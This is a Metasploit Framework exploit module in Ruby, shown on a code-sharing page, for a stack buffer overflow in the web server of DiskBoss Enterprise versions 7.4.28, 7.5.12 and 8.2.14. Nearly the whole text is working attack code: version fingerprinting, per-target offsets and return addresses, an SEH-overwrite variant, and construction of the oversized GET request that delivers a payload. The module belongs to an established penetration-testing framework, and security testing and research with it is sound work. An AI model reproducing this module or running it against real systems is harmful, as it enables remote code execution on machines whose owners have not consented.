CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/diskboss_get_bof.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Seh

10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'DiskBoss Enterprise GET Buffer Overflow',

15
      'Description'    => %q{

16
          This module exploits a stack-based buffer overflow vulnerability

17
        in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,

18
        caused by improper bounds checking of the request path in HTTP GET

19
        requests sent to the built-in web server. This module has been

20
        tested successfully on Windows XP SP3 and Windows 7 SP1.

21
      },

22
      'License'        => MSF_LICENSE,

23
      'Author'         =>

24
        [

25
          'vportal',        # Vulnerability discovery and PoC

26
          'Ahmad Mahfouz',  # Vulnerability discovery and PoC

27
          'Gabor Seljan',   # Metasploit module

28
          'Jacob Robles'    # Metasploit module

29
        ],

30
      'References'     =>

31
        [

32
          ['EDB', '40869'],

33
          ['EDB', '42395']

34
        ],

35
      'DefaultOptions' =>

36
        {

37
          'EXITFUNC' => 'thread'

38
        },

39
      'Platform'       => 'win',

40
      'Payload'        =>

41
        {

42
          'BadChars'   => "\x00\x09\x0a\x0d\x20",

43
          'Space'      => 2000

44
        },

45
      'Targets'        =>

46
        [

47
          [

48
            'Automatic Targeting',

49
            {

50
              'auto' => true

51
            }

52
          ],

53
          [

54
            'DiskBoss Enterprise v7.4.28',

55
            {

56
              'Offset' => 2471,

57
              'Ret'    => 0x1004605c  # ADD ESP,0x68 # RETN [libpal.dll]

58
            }

59
          ],

60
          [

61
            'DiskBoss Enterprise v7.5.12',

62
            {

63
              'Offset' => 2471,

64
              'Ret'    => 0x100461da  # ADD ESP,0x68 # RETN [libpal.dll]

65
            }

66
          ],

67
          [

68
            'DiskBoss Enterprise v8.2.14',

69
            {

70
              'Offset' => 2496,

71
              'Ret'    => 0x1002A8CA  # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]

72
            }

73
          ]

74
        ],

75
      'Privileged'     => true,

76
      'DisclosureDate' => '2016-12-05',

77
      'DefaultTarget'  => 0))

78
  end

79


80
  def check

81
    res = send_request_cgi(

82
      'method' => 'GET',

83
      'uri'    => '/'

84
    )

85


86
    if res && res.code == 200

87
      if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/

88
        return Exploit::CheckCode::Vulnerable

89
      elsif res.body =~ /DiskBoss Enterprise/

90
        return Exploit::CheckCode::Detected

91
      end

92
    else

93
      vprint_error('Unable to determine due to a HTTP connection timeout')

94
      return Exploit::CheckCode::Unknown

95
    end

96


97
    Exploit::CheckCode::Safe

98
  end

99


100
  def exploit

101
    mytarget = target

102


103
    if target['auto']

104
      mytarget = nil

105


106
      print_status('Automatically detecting the target...')

107


108
      res = send_request_cgi(

109
        'method' => 'GET',

110
        'uri'    => '/'

111
      )

112


113
      if res && res.code == 200

114
        if res.body =~ /DiskBoss Enterprise v7\.4\.28/

115
          mytarget = targets[1]

116
        elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/

117
          mytarget = targets[2]

118
        elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/

119
          mytarget = targets[3]

120
        end

121
      end

122


123
      if !mytarget

124
        fail_with(Failure::NoTarget, 'No matching target')

125
      end

126


127
      print_status("Selected Target: #{mytarget.name}")

128
    end

129


130
    case mytarget

131
    when targets[1], targets[2]

132
      sploit =  make_nops(21)

133
      sploit << payload.encoded

134
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)

135
      sploit << [mytarget.ret].pack('V')

136
      sploit << rand_text_alpha(2500)

137
    when targets[3]

138
      seh = generate_seh_record(mytarget.ret)

139
      sploit = payload.encoded

140
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)

141
      sploit[sploit.length, seh.length] = seh

142
      sploit <<  make_nops(10)

143
      sploit << Rex::Arch::X86.jmp(0xffffbf25)   # JMP to ShellCode

144
      sploit << rand_text_alpha(5000 - sploit.length)

145
    else

146
      fail_with(Failure::NoTarget, 'No matching target')

147
    end

148


149
    send_request_cgi(

150
      'method' => 'GET',

151
      'uri'    => sploit

152
    )

153
  end

154
end

155


156